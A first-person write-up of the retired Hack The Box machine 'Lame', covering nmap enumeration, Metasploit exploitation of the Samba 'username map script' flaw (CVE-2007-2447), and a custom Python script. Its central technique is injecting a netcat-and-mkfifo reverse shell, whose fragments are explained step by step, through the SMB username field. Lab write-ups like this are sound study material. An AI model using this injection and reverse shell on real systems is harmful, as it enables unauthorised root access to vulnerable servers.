Dive into Hack the Box — Lame
Lame is an easy retired Linux machine in the popular pen-test platform Hack The Box where we can learn about basic enumeration and CVE exploration. In this writeup we will understand how to explore the vulnerability using a known exploit. Then we will dive deep into that and create our own code to exploit it.
First of all, let’s start by scanning the host using Zenmap/Nmap tool:
nmap -sV -A 10.10.10.3A little explanation about the arguments:
- -sV determine service/version
- -A enable OS detection, version detection, script scanning, and traceroute
So we found:
- A Samba server running in an old version
- An OpenSSH server
- A FTP server
Taking a look at the Nmap output we find that the FTP server allows anonymous login:
Maybe there is something useful there, so let’s take a look by connecting on the FTP server in anonymous mode:
Although we could attempt to access the server, it seems empty. So let’s try another way by checking Samba server. Samba is a server that allows you to share files and printers with Windows-based and other operating systems, you can learn more about it here.
We know that there is a Samba 3.0.20 server running on port 445.
A search about it in Google reveals that this version has a bunch of vulnerabilities that allow remote code execution:
Some of them have public Metasploit modules so we can choose one. I’ve tried to use the module related to CVE-2007–2446 but it doesn’t seem to work so I moved to another one: Samba “username map script” Command Execution related to CVE-2007–2447.
This exploit explores a known vulnerability related to the username map script Samba configuration option that allows remote code execution by specifying a username containing shell metacharacters.
Let’s use this module in Metasploit:
As we could see, this exploit requires us to set the server and port host. RHOSTS must be the machine’s IP (10.10.10.3). We found that the Samba 3.0.20 server is running on 445 port so RPORT must be defined as 445.
Run the exploit and… We got it! Now we have a shell with root privileges:
Now It’s just about searching the user and root flags:
Understanding the vulnerability
To understand how this attack works let’s check the explanation from the official Samba website:
“This bug was originally reported against the anonymous calls to the SamrChangePassword() MS-RPC function in combination with the “username map script” smb.conf option (which is not enabled by default).
After further investigation by Samba developers, it was determined that the problem was much broader and impacts remote printer and file share management as well. The root cause is passing unfiltered user input provided via MS-RPC calls to /bin/sh when invoking externals scripts defined in smb.conf. However, unlike the “username map script” vulnerability, the remote file and printer management scripts require an authenticated user session.”
So basically, username map script is a configuration that we can set up to allow mapping users in the authentication flow. What happens here is that the function allows non-escaped metacharacters. So we can pass shell commands by sending specific characters as username argument in order to open a reverse shell to our local machine.
Creating our script
Now that we already know how to explore this vulnerability, we can create our script. What we want is to send a command to the remote Samba server to open a reverse shell to our local machine. We can do this using netcat, but first let’s get some help from msfvenom. We want a payload to generate reverse shells in Unix based systems, so we can filter it using:
It can be seen that there are many different implementations of a reverse shell. We pick the netcat based reverse shell.
As we can see above, this payload requires us to pass the local host and port:
By generating our payload passing the local host and port we get the following output:
So what does that mean? Let’s dive in…
First, a pipe is created by typing:
mkfifo /tmp/[pipe_name]A pipe provides an inter-process communication where one or more processes can write in while others can read. It implements a first in first out (FIFO) like a queue. There is a good explanation about named pipes here.
Then a connection with the local machine is started using netcat:
nc [local_ip] [local_port]and this connection will read from the pipe:
< tmp/[pipe_name]At the same time we set the shell process as the writer:
/bin/sh > /tmp/[pipe_name]And we set the output as stdout:
2>&1After the connection is closed the pipe is deleted:
rm /tmp/<pipe_name>Now that we understand what these commands do, let’s make a customizable script in Python that allows us to send this command through a Samba connection passing the local and remote info as arguments.
There is not much to explain here. The script uses the pysmb lib to start a Samba connection and the command string we saw before is formatted with the arguments passed by command line. Argparse lib helps us to define arguments, in order to see all the options just type:
python username_map_script.py -h
Before we run the script we need to listen to the connections that will arrive in our host. In my case, I defined the port 4444 so I will listen to any connection that arrives on this port. If you want to define another port don’t forget to pass this argument to the script.
To do this, I use netcat. Here is a brief explanation of the arguments:
- l means listen mode
- v is for verbose mode
- n shows only IP-addresses
- p sets the port
After that, we can now run the script. As we can see below, it works perfectly! We could get a shell and find the user and root flags as well.
And that is my first writeup. Thanks for reading and let me know if you have any issues or feedbacks!
